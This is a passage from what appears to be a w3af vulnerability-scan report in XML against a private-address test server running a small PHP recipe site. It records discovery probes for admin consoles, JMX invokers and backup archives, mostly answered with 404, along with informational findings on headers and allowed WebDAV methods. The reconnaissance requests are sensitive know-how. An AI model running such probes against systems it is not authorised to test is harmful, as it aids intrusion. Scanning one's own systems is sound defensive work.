                    <status>GET http://10.12.68.43:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about invoker/JMXInvokerServlet has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='invoker/JMXInvokerServlet'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="213">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="215">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="216">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="218">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="101">
                <http-request>
                    <status>GET http://10.12.68.43:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="102">
                <http-request>
                    <status>GET http://10.12.68.43:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="107">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ulpjm.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/ulpjm.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="204">
                <http-request>
                    <status>GET http://10.12.68.43:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about admin-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='admin-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="127">
                <http-request>
                    <status>GET http://10.12.68.43:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about server-status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='server-status'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[62]" method="GET" name="Omitted server header" plugin="server_header" severity="Information" url="None" var="None">
        <description>The remote HTTP Server omitted the &quot;server&quot; header in its response.</description>
        <http-transactions>
            <http-transaction id="62">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[89]" method="GET" name="Powered-by header" plugin="server_header" severity="Information" url="None" var="None">
        <description>The x-powered-by header for the target HTTP server is &quot;PHP/5.6.9&quot;.</description>
        <http-transactions>
            <http-transaction id="89">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[35, 56, 65, 79, 198, 232, 240, 288, 341, 381, 398, 438, 476, 498, 510, 551, 572, 588, 599, 624, 635, 646, 669, 696, 715]" method="GET" name="DAV methods enabled" plugin="allowed_methods" severity="Information" url="http://10.12.68.43:31337/" var="None">
        <description>The URL &quot;http://10.12.68.43:31337/&quot; has the following allowed methods. These include DAV methods and should be disabled: *, CHECKOUT, CONNECT, COPY, GET, HEAD, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, REPORT, SUBSCRIBE, TRACE, UNLOCK, UNSUBSCRIBE.</description>
        <http-transactions>
            <http-transaction id="35">
                <http-request>
                    <status>OPTIONS http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="56">
                <http-request>
                    <status>MKCOL http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="65">
                <http-request>
                    <status>MOVE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="79">
                <http-request>
                    <status>HEAD http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                </http-response>
            </http-transaction>
            <http-transaction id="198">
                <http-request>
                    <status>REPORT http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="232">
                <http-request>
                    <status>NOTIFY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="240">
                <http-request>
                    <status>OPTIONS http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="288">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="398">
                <http-request>
                    <status>CHECKOUT http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="438">
                <http-request>
                    <status>PROPFIND http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="476">
                <http-request>
                    <status>SUBSCRIBE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="498">
                <http-request>
                    <status>LOCK http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="510">
                <http-request>
                    <status>MKDIR http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="551">
                <http-request>
                    <status>MKWORKSPACE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="close" field="connection"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about /* has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='/*'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="572">
                <http-request>
                    <status>MERGE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="588">
                <http-request>
                    <status>UNLOCK http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
